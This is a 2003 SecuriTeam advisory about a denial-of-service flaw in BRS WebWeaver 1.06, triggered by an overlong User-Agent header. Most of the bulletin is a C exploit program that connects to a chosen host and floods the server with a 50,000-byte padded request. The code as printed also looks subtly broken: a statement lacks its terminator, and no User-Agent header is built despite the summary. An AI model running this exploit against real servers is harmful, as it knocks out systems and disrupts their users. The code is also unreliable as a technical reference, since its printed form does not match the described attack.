[NT] BRS WebWeaver User-Agent DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 11/05/03

    To: list@securiteam.com
    Date: 5 Nov 2003 18:27:58 +0200

    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      BRS WebWeaver User-Agent DoS

    SUMMARY

    BRS WebWeaver HTTPd crashes and freezes the whole system, when it gets a
    request that contains a long string within `User-Agent` field.

    DETAILS

    Vulnerable systems:
     * BRS WebWeaver version 1.06

    Exploit:
    /*
     * BRS WebWeaver v.1.06 remote DoS exploit
     *
     * -d4rkgr3y [d4rk@securitylab.ru]
     *
     */

    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/socket.h>

    #define port 80

    main(int argc, char **argv) {
      struct hostent *hs;
      struct sockaddr_in sock;
      int sockfd, i;
      const c = 50000;
      char request[50150] =
        "GET /m00-r0cz HTTP/1.0\n"
        "Accept: */*\n"
      printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");

      if (argc!=2){
        printf("usage\n %s hostname\n\n",argv[0]);
        exit(1);
      }

      //memset((request+98),0x41,c);
      memset((request+strlen(request)),0x41,c);
      /* l33t ;] */
      request[strlen(request)] = 0x0a;
      request[strlen(request)] = 0x43;
      request[strlen(request)] = 0x6f;
      request[strlen(request)] = 0x6e;
      request[strlen(request)] = 0x6e;
      request[strlen(request)] = 0x65;
      request[strlen(request)] = 0x63;
      request[strlen(request)] = 0x74;
      request[strlen(request)] = 0x69;
      request[strlen(request)] = 0x6f;
      request[strlen(request)] = 0x6e;
      request[strlen(request)] = 0x3a;
      request[strlen(request)] = 0x20;
      request[strlen(request)] = 0x4b;
      request[strlen(request)] = 0x65;
      request[strlen(request)] = 0x65;
      request[strlen(request)] = 0x70;
      request[strlen(request)] = 0x2d;
      request[strlen(request)] = 0x41;
      request[strlen(request)] = 0x6c;
      request[strlen(request)] = 0x69;
      request[strlen(request)] = 0x76;
      request[strlen(request)] = 0x65;
      request[strlen(request)] = 0x0a;
      request[strlen(request)] = 0x0a;

      bzero(&sock, sizeof(sock));
      sock.sin_family = AF_INET;
      sock.sin_port = htons(port);
      if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
        if ((hs=gethostbyname(argv[1]))==NULL) {
          printf("damn");
          exit(1);
        }
        printf("~ Host resolved.\n");
        sock.sin_family = hs->h_addrtype;
        memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
      }
      if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
        perror("damn"); exit(0);
      }

      if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
        perror("damn"); exit(0);
      }
      printf("~ Socket connected\n");
      printf("~ Sending evil code... ");
      write(sockfd,request,strlen(request));
      printf("done\n\n");
      close(sockfd);
    }
    /* m00 */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:d4rk@securitylab.ru>
    d4rkgr3y.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] TinyWeb Server DoS Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] 3Com FTP Server Buffer Overflow (CD)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] Automagic SQL Injector
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer can be crashed remotely ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)